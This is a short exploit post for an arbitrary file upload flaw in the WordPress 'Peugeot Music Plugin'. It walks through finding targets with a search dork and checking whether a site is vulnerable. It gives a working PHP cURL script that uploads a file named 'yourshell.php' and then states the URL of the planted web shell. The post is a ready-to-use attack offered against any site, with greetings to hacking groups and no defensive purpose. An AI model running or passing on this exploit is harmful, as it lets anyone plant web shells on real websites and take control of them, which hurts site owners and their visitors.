Exploit Title : WP-Plugins Peugeot Music Plugin Arbitrary File Upload
Author : Mr.7z
Vendor Homepage : -
Vendor Github : -
Date : 23 May 2018
Tested on : Windows 10 (Home Edition)
• Search Dork On Google
• Choose Target
• Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php
• Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
• CSRF
<?php
$url = "http://target.com /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
For CSRF using php xampp.
• Shell Locate:
/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
-Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team - Typical Idiot Security [!]